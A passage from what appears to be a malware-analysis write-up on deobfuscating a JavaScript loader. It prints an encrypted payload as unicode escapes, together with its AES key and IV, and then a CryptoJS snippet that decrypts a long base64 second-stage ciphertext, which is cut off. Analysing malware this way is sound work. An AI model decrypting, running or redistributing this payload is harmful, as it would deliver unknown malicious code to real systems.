00CB\u0007\u0031\u0095\u0006\u002F\u000F\u0052\u0051\u0065\u0001\u00B0\u00ED\u00B2\u0011\u0029\u00FE\u0017\u0087\u00B3\u002B\u00BF\u0002\u0019\u00A1\u0034\u0048\u00C3\u0075\u004C\u0099\u00AE\u00D7\u00CC\u0048\u00F3\u00D5\u008A\u0021\u00E5\u00BF\u00BC\u00B5\u005A\u00E6\u00D7\u0014\u00E3\u007F\u0024\u005C\u00EE\u008A\u006B\u008C\u00F1\u004C\u0044\u0091\u004E\u00E5\u000D\u00E7\u0090\u0081\u006B\u00E7\u00B6\u008A\u00CB\u00BB\u000B\u006B\u0051\u0036\u00F1\u0095\u0031\u0049\u00EE\u00A6\u008D\u004D\u0070\u00D1\u0031\u003E\u00A8\u005F\u0099\u0084\u0091\u00C4\u0035\u00FE\u0090\u00CF\u0086\u00C2\u001E\u00E0\u0093\u0069\u0031\u0040\u00B8\u0005\u00CE\u00F2\u00C7\u00CF\u0017\u0053\u00A7\u00B5\u0090\u0098\u0065\u005C\u00D8\u00FF\u0041\u00B3\u00FB\u0017\u004B\u00F2\u003A\u00B5\u00C8\u0067\u00AE\u0064\u0092\u0061\u00FC\u005F\u00E3\u0040\u00B8\u00FC\u000C\u00AB\u0058\u0091\u0049\u0069\u0089\u00A7\u0015\u0038\u0048\u0076\u00D8\u007B\u0067\u006C\u00AA\u0095\u00F6\u00E0\u0068\u000D\u0072\u00F9\u00E4\u0092\u0071\u0075\u00EE\u00F0\u00AF\u0069\u009D\u0061\u00BF\u009C\u00DE\u00A7\u00DD\u00BB\u00CB\u006F\u003C\u006B\u0083\u00EF\u00FA\u005A\u00FC\u00FF\u0093\u0097\u00EB\u0053\u0026\u00F7\u00A7\u001B\u000B\u004A\u00D7\u00AA\u00D8\u00B2\u003D\u00DC\u0086\u003C\u00BB\u005A\u00D5\u00B0\u00CB\u0061\u00F1\u0012\u00B5\u003F\u00A3\u0038\u00EC\u00DE\u0049\u00F2\u00F7\u00B6\u00BC\u005E\u00DA\u0008\u002E\u0053\u0060\u00E8\u005B\u00C7\u00F4\u0013\u00BA\u004E\u0066\u0033\u0051\u0088\u00D1\u00C1\u0022\u000E\u00AB\u0084\u00BB\u002E\u0097\u00EB\u002D\u0075\u0008\u0025\u0037\u0078\u005E\u00F2\u0087\u0048\u0067\u00B9\u0088\u0031\u009C\u000D\u008A\u005D\u0051\u0081\u00C8\u00D5\u007D\u00A2\u00FB\u00BC\u00DC\u0008\u0042\u002D\u00FE\u00EA\u008F\u002F\u00F1\u002F\u0081\u001D\u0069\u0010\u0021\u00C3\u0081\u0054\u0040\u0085\u006B\u00D1\u0028\u0029\u007D\u0081\u0059\u00B6\u006F\u0008\u0044\u00F9\u00F6\u00B2\u0079\u0091\u0077\u00D4\u0040\u00C8\u0085\u0037\u008A\u004C\u0034\u00D4\u009A\u002F\u00F0\u0058\u00F6\u0014\u000E\u00FA\u00B6\u0094\u0089\u00BA\u00E5\u00E3\u0058\u0072\u00E5\u0033\u0087\u003F\u00E3\u001E\u0030\u0021\u00FB\u0034\u00C8\u00E0\u0044\u007E\u003A\u00CF\u00C8\u002D\u00BE\u00A4\u009B\u0060\u004C\u0077\u00CE\u001D\u0053\u001E\u00CE\u00D5\u00E4\u0032\u00B4\u0032\u004A\u009F\u00D1\u00E4\u0068\u000F\u00C9\u007B\u0098\u00F4\u0074\u002E\u0001\u00F4\u0082\u0097\u00D6\u000F\u0082\u0006\u0049\u0016\u00BF\u0077\u0057\u00B7\u0088\u0019\u0087\u00E4\u0092\u0036\u0036\u0076\u0075\u002F\u0028\u0093\u008E\u0089\u004B\u0068\u008F\u0091\u0097\u00BC\u005F\u003C\u00EA\u008D\u0094\u00D0\u00CC\u0050\u00D8\u00C1\u009A\u0074\u009F\u0064\u00CB\u0014\u0089\u0019\u0044\u00EB\u004E\u004A\u00CF\u009A\u0007\u00FA\u0087\u0009\u006E\u00CB\u00CF\u00FD\u0025\u0099\u00B7\u00A3\u000C\u0054\u0029\u007F\u00CA\u007F\u00BD\u0080\u005C\u0071\u0067\u009D\u0040\u002E\u008B\u005D\u0074\u006E\u0091\u0092\u0035\u0093\u00F4\u000A\u00E0\u0031\u00D2\u0039\u00EE\u00BD\u00D7\u0063\u00F6\u0096\u0062\u00F7\u005F\u0086\u0051\u0052\u00DE\u0021\u002E\u0095\u00F0\u0058\u0056\u0080\u004C\u00D9\u0062\u0088\u009B\u0095\u0046\u00F7\u00D8\u00B7\u0076\u0083\u00C0\u00ED\u0014\u005D\u0041\u00CB\u00BE\u0011\u00D6\u0014\u00CF\u0030\u008F\u006F\u0032\u00A6\u002D\u0017\u0075\u00AA\u0011\u003C\u0009\u00F2\u00C7\u00BB\u00CF\u00C9\u00C3\u0052\u00CD\u003F\u0067\u0011\u0002\u00F2\u0002\u006B\u00B5\u000E\u00DE\u0048\u003A\u008E\u000C\u00A2\u00E4\u00BD\u00BF\u0095\u00D9\u007B\u00CF\u007E\u003F\u0082\u00B0\u0041\u00AC\u00AC\u0091\u004B\u005A\u0038\u0039\u001D\u00D4\u00CA\u00E9\u0080\u00CD\u00DA\u00E5\u0018\u00D1\u0047\u00FA\u007E\u00E4\u00EA\u00D9\u0084\u0043\u0099\u00BF\u00A7\u00D8\u00B7\u0005\u004E\u00DF\u0054\u0060\u0080\u00E5\u0048\u0044\u00E5\u00D2\u0057\u0093\u00C7\u00F7\u0020\u0020\u0027\u0052\u000F\u00CD\u009C\u00D2\u006A\u00E2\u0007\u00E9\u0005\u00A0\u00D1\u00AC\u00F7\u00C8\u0001\u00E9\u00C8\u0046\u0099\u0086\u0065\u00B4\u001B\u007E\u007E\u007C\u00F1\u00B9\u00E9\u0063\u00AE\u0044\u00FD\u0070\u00C5\u00D8\u001A\u00D8\u0099\u00A5\u0043\u00D4\u00A9\u001E\u001D\u0060\u000F\u0023\u0020\u00D6\u00FD\u000D\u00BF\u00EE\u0066\u001E\u008B\u0095\u009F\u0072\u00E1\u00A1\u0006\u0097\u00DF\u007C\u00FA\u0086\u00E2\u00D9\u0014\u0097\u00F1\u00D0\u003C\u008F\u0026\u004F\u003A\u00E4\u00CD\u0000\u00EC\u000B\u006E\u000E\u0021\u00F3\u00F1\u0058\u002A\u0028\u00CB\u006B\u00B6\u0001\u000F\u0012\u0078\u00F4\u0092\u008F\u00B8\u0098\u0096\u00E8\u00A8\u0015\u000F\u004F\u007C\u0084\u001D\u0062\u00EF\u00B4\u00CD\u00A6\u0049\u0039\u00CF\u003B\u00BB\u0071\u0050\u00C2\u00CE\u008A\u0058\u00FA\u0034\u00C0\u001F\u005F\u007A\u00E6\u006C\u007A\u00C2\u0057\u0043\u00A6\u0016\u0053\u0026\u0060\u00A6\u0053\u009E\u00E2\u00E9\u0047\u0048\u0089\u0095\u00F2\u00BE\u007E\u006C\u004C\u00E6\u0003\u0024\u00AC\u00EA\u004E\u00B2\u0037\u0049\u002C\u00B1\u00B9\u00C1\u0085\u00C9\u00EA\u00D5\u0057\u003A\u000F\u0012\u00A6\u0018\u0033\u00C9\u0069\u00DC\u000A\u0001\u002B\u008E\u001C\u00EB\u0031\u0033\u00F8\u006D\u0059\u00C0\u0075\u00E9\u0056\u009F\u0073\u0093\u0018\u00B4\u00E7\u0078\u00C3\u001A\u0072\u0030\u003F\u0068\u0066\u00F6\u002B\u001A\u0094\u0004\u0044\u0067\u00A5\u009C\u0038\u0099\u00DA\u0010\u0008\u00C6\u0017\u00E3\u0061\u00D1\u005D\u00B5\u00E2\u009D\u00C6\u0087\u00FB\u003D\u00A9\u0028\u0018\u000D\u007D\u00FA\u006C\u00D2\u00B9\u008D\u000E\u007E\u0092\u0095\u0072\u003E\u00B5\u007B\u00AE\u0097\u0005\u00E5\u005D\u0090\u0003\u0091\u009C\u0053\u00E1\u008B\u00E5\u00A5\u00F6\u00E9\u00F3\u0077\u00C9\u00AC\u0010\u0064\u00F2\u00EF\u00B4\u0060\u0080\u007E\u00CF\u00FB\u00A4\u0038\u0025\u0032\u00A5\u00CE\u0046\u00DD\u0087\u0054\u0077\u0036\u006A\u0049\u0024\u00BC\u0012\u004D\u0027\u0039\u0062\u0034\u00D7\u006D\u007F\u00C5\u0026\u0072\u0068\u00EE\u00DD\u00FA\u0092\u001C\u006E\u00CE\u005D\u00F8\u00F5\u007B\u00FA\u0022\u00D3\u004D\u0052\u007F\u00AC\u0074\u005F\u002A\u0045\u004C\u0043\u0068\u0066\u002C\u001D\u006A\u003C\u0000\u0077\u008C\u006D\u00FD\u0038\u0012\u001E\u00D1\u0098\u00A7\u0093\u001B\u00B6\u00E8\u00A3\u00F1\u007C\u0099\u00E7\u0077\u0012\u00CA\u0061\u003F\u0017\u0041\u0027\u00E2\u00E6\u008D\u007C\u00E9\u00B0\u006E\u0099\u00D1\u00B9\u00DC\u00CD\u00DE\u001B\u004A\u00F5\u0026\u007C\u002A\u0064\u008C\u008D\u0068\u00FF\u003F\u0073\u003B\u0082\u0098\u0089\u0079\u0098\u00B2\u00A1\u00B8\u0037\u0004\u00F4\u001F\u00EA\u0000\u0015\u003C\u0053\u002A\u0073\u0051\u0073\u00F9\u0018\u00A5\u0034\u0080\u005E\u00BE\u000C\u00E9\u00D4\u00ED\u009A\u0023\u002C\u0036\u004C\u00D5\u00D5\u009E\u0031\u0085\u0001\u00DA\u0043\u002D\u00FC\u00B4\u00B9\u00C9\u006F\u00EA\u0031\u0051\u00F4\u00DF\u0039\u0058\u008C\u0053\u0070\u000F\u0040\u00FA\u00E2\u0084\u00DB\u0016\u00A4\u000D\u006A\u0074\u0068\u0068\u009B\u0056\u002D\u00CC\u002B\u0054\u0026\u00F8\u00DB\u00AC\u00AF\u00A7\u00FB\u0001\u00A8\u00CF\u0036\u00F6\u0095\u0072\u00B4\u00B2\u0054\u005F\u0099\u00BB\u00CC\u006C\u0060\u0087\u007C\u00AA\u001B\u00CA\u0001\u00CB\u0097\u0050\u00B7\u002C\u001C\u0085\u0049\u0012\u0056\u0011\u00CC\u0021\u0096\u00E9\u003E\u0071\u008A\u00B7\u0090\u0087\u00D1\u0043\u00B7\u0028\u00EF\u0091\u0065\u00C7\u008F\u005B\u005E\u0004\u00E8\u0082\u0084\u00E1\u0036\u0024\u00B9\u00DB\u00FA\u0058\u001C\u003C\u005D\u0078\u00E4\u006C\u00E9\u00F5\u0013\u0020\u00E7\u0009\u00E0\u0016\u0062\u0024\u0042\u00CD\u005B\u001E\u00B7\u0020\u003D\u00C3\u000B\u00DD\u005A\u0040\u0031\u0089\u00C5\u0022\u00F6\u003E\u0054\u0052\u00C1\u0099\u0043\u00BF\u00C2\u00A4\u0038\u00CA\u00C4\u00B9\u0069\u0044\u00DE\u0016\u0085\u00A9\u00CB\u00F3\u0098\u0043\u00C8\u00C1\u000F\u004F\u006B\u0010\u0025\u0000\u00F3\u00C1\u00EC\u008E\u007A\u00CB\u00D3\u003F\u00AA\u00F7\u00C4\u007E\u00E8\u00BA\u0009\u005B\u001A\u0078\u005E\u0017\u0001\u00C3\u00B1\u00A2\u006B\u002B\u0043\u0014\u009F\u0016\u0013\u00D0\u0032\u007F\u00F8\u00FC\u006D\u00A1\u0026\u00F9\u0093\u006D\u0027\u00F8\u00C2\u008B\u00E3\u00CA\u0001\u003B\u0017\u0084\u005C\u0036\u0092\u00A9\u0088\u00D3\u0042\u0027\u00D8\u001F\u008F\u0021\u0013\u00D0\u0008\u0020\u00D4\u000D\u0088\u00F8\u0045\u00F1\u0089\u0088\u0013\u0017\u005B\u00C7\u0031\u004F\u0023\u00DB\u002F\u0055\u0032\u009E\u0098\u0052\u00C6\u004D\u00B6\u00D8\u007A\u0032\u00F4\u002D\u00A7\u00E8\u0086\u0066\u003C\u00EC\u004C\u0076\u00F7\u0020\u00E0\u004C\u0088\u0054\u000B\u0030\u00F8\u00FB\u00CA\u0050\u003B\u0099\u008D\u005B\u00D0\u0036\u005F\u002C\u003F\u00BC\u0068\u007B\u0045\u00B9\u00A3\u00E4\u0081\u00D7\u00B9\u00CB\u00EB\u004B\u00F2\u0085\u00EA\u0027\u0065\u000D\u006D\u0074\u00F5\u007B\u00C5\u009E\u001F\u001C\u00CD\u0010\u000B\u0079\u00C5\u0027\u00D4\u002A\u00D8\u001F\u0057\u0001\u0017\u005A\u004A\u005A\u0043\u00B4\u00A6\u0059\u00E0\u00FB\u008A\u0009\u00BC\u00E4\u005F\u0047\u0092\u00B7\u00AD\u002C\u0052\u0073\u000B\u008D\u003B\u0071\u00B2\u00C0\u00D2\u0029\u0031\u0028\u00D7\u0009\u0075\u00F8\u00CF\u00ED\u009B\u007A\u0063\u00D8\u005C\u00B9\u00AA\u00A3\u0018\u0055\u00D6\u0070\u00E3\u002B\u0089\u004E\u00B6\u001E\u00FC\u001B\u00D7\u0056\u003B\u007F\u00F2\u00B8\u00BB\u00FF\u0088\u00B6\u0006\u0009\u0008\u009C\u0069\u0020\u006A\u00C7\u0093\u0091\u007C\u006B\u006A\u00C9\u00A4\u009D\u0080\u006B\u006D\u0031\u0010\u007D\u004E\u0062\u0047\u000E\u00C7\u0082\u00D0\u00A1\u0098\u009B\u0047\u0077\u0042\u00C7\u005A\u003F\u00F9\u005F\u0070\u00AF\u00EE\u0086\u0096\u00B8\u00A9\u0026\u008B\u00BC\u0008\u002B\u0014\u00C4\u0084\u000F\u0052\u0026\u000B\u0027\u0084\u006B\u004A\u00F9\u0040\u0002\u00C7\u0022\u0065\u003A\u0079\u0049\u0005\u0083\u00EA\u0001\u0043\u00E4\u001F\u00C0\u00AB\u0036\u007E\u0061\u0010\u002E\u0005\u002D\u00F7\u008B\u0046\u00D0\u009F\u0010\u00A2\u0067\u00BB\u0094\u00CD\u000E\u00A1\u0049\u00E2\u0082\u0043\u009F\u00A9\u00BA\u0051\u00FF\u0060\u00F4\u0063\u006C\u00E4\u0007\u009B\u00A2\u0069\u00DB\u00AA\u00F0\u008B\u0080\u00D5\u00CE\u008F\u006A\u0076\u0082\u0030\u0034\u00B1\u009E\u009E\u00D2\u009F\u00AD\u008C\u00B1\u00EB\u0063\u00DC\u00F2\u0047\u0028\u00AC\u00F4\u00EF\u0054\u003B\u0066\u00B1\u0005\u00FF\u008C\u007B\u001A\u0011\u002F\u001A\u0074\u0048\u0024\u0046\u0047\u008A\u0032\u00E6\u00F4\u0042\u00A8\u0099\u00EF\u0016\u0040\u00D2\u00F2\u0093\u00E8\u0066\u00F3\u000E\u0058\u00E1\u00A5\u00D8\u00B5\u00EC\u00F5\u0040\u009F\u0016\u0017\u00EC\u0065\u0019\u000D\u001D\u00E6\u00D7\u006E\u006B\u0009\u007C\u003F\u0007\u00D3\u00C8\u00F9\u0017\u009E\u00E7\u0074\u005E\u00AA\u0083\u00EA\u00A9\u0005\u00E9\u0033\u000E\u00DB\u00D8\u0081\u0097\u0089\u0060\u00B0\u00A3\u00DA\u0068\u009F\u001B\u00CC\u0054\u003B\u0035\u009F\u00F4\u008D\u0062\u00FB\u00F5\u006D\u0090\u00C5\u00E0\u009D\u00CD\u0080\u0030\u00DF\u0042\u0073\u00AE\u0033\u00A5\u0015\u009F\u00D9\u0008\u0056\u00B0\u0096\u00C4\u002F\u0040\u002A\u00B6\u00B0\u0053\u00B7\u00AB\u0021\u003F\u0054\u00C7\u006A\u00A5\u00BC\u0068\u009D\u00CC\u00B0\u00A3\u0004\u0019\u004B\u0027\u006C\u00A1\u0035\u0028\u00D1\u0057\u006A\u0066\u0054\u0047\u00E0\u007C\u0039\u0013\u0079\u0056\u006B\u00CE\u001E\u00CB\u0006\u0082\u00AB\u000C\u00EC\u0099\u00A3\u00A0\u00B9\u00BD\u00A9\u009A\u0062\u00F1\u000E\u0041\u00DC\u00CF\u0069\u0076\u00B0\u006D\u00BA\u00F6\u00D1\u0049\u00F9\u001F\u004D\u0031\u0095\u00C5\u00BC\u0013\u0071\u00D0\u00D5\u0063\u00B4\u0027\u00A6\u0019\u0051\u0002\u004B\u00E2\u0086\u0026\u00EF\u003A\u00B6\u005B\u00B5\u0032\u00A8\u0049\u00D6\u00F3\u001E\u002C\u0035\u001E\u0000\u007A\u007C\u006B\u0075\u0036\u00F9\u000F\u00AB\u00A3\u00B2\u00BD\u004E\u00F1\u0049\u0011\u00DC\u00D0\u00AC\u0074\u00B9\u0009\u00EF\u0029\u00B4\u0075\u0002\u00DD\u0058\u0018\u008C\u0000\u0006\u00BE\u005D\u0041\u008F\u0073\u004C\u00EC\u0029\u000D\u00D1\u009F\u003D\u00CC\u00F3\u0001\u0039\u0038\u00D8\u00A5\u0054\u0044\u005D\u0072\u0098\u005F\u00CD\u0092\u00A1\u00A3\u00AF\u00D3\u0086\u00F0\u00BC\u006B\u00E5\u00F1\u0008\u00CE\u0053\u00B5\u00D2\u0055\u00C6\u0019\u0052\u0040\u003E\u005E\u008A\u00EC\u009C\u0012\u002C\u00D5\u00EA\u000B\u00C6\u0057\u0040\u0060\u008B\u00E8\u000F\u001A\u00A0\u008C\u0021\u00BC\u002A\u003B\u0028\u00A2\u0077\u00A3\u00EB\u00E6\u0035\u0068\u0024\u0098\u00AA\u00FD\u007F\u0096\u004B\u00EB\u0054\u0049\u0060\u00B2\u0055\u00BF\u001F\u006C\u0013\u006B\u00AA\u0010\u00BF\u00EC\u00B2\u00B9\u00A9\u0029\u0086\u0068\u008F\u0037\u0046\u0017\u0001\u000E\u000C\u0062\u0010\u00C5\u00F4\u0089\u00FD\u0045\u009F\u0026\u005C\u003F\u005C\u0027\u00F3\u00BF\u009C\u00C9\u0066\u007E\u005B\u0043\u0016\u00DA\u000F\u0097\u0070\u0065\u000F";
    var key = "\u00DB\u00ED\u0098\u006C\u00B1\u0089\u00A1\u0047\u0095\u00F2\u008A\u00B3\u0017\u00AF\u004C\u002D\u00B2\u0007\u0037\u0029\u00CF\u0054\u00BC\u0093";
    var iv = "\u00E4\u0075\u0026\u0014\u00CA\u004A\u0037\u002F\u0038\u0009\u00FC\u00C6\u000D\u0009\u0030\u008A";

    console.log("Base64 Encoded Payload: ", unicodeToBase64(payload));
    console.log("Base64 Encoded Key: ", unicodeToBase64(key));
    console.log("Base64 Encoded IV: ", unicodeToBase64(iv));
})();

After we get the base64 values, we can use console.log to debug and output the second payload dynamically. Credits to @SteakEnthusiast for a cleaner decryption script.

1
2
3
4
5
6
7
const CryptoJS = require("./crypto-js");

console.log(CryptoJS["AES"]["decrypt"]({
  ciphertext: CryptoJS["enc"]["Base64"]["parse"]("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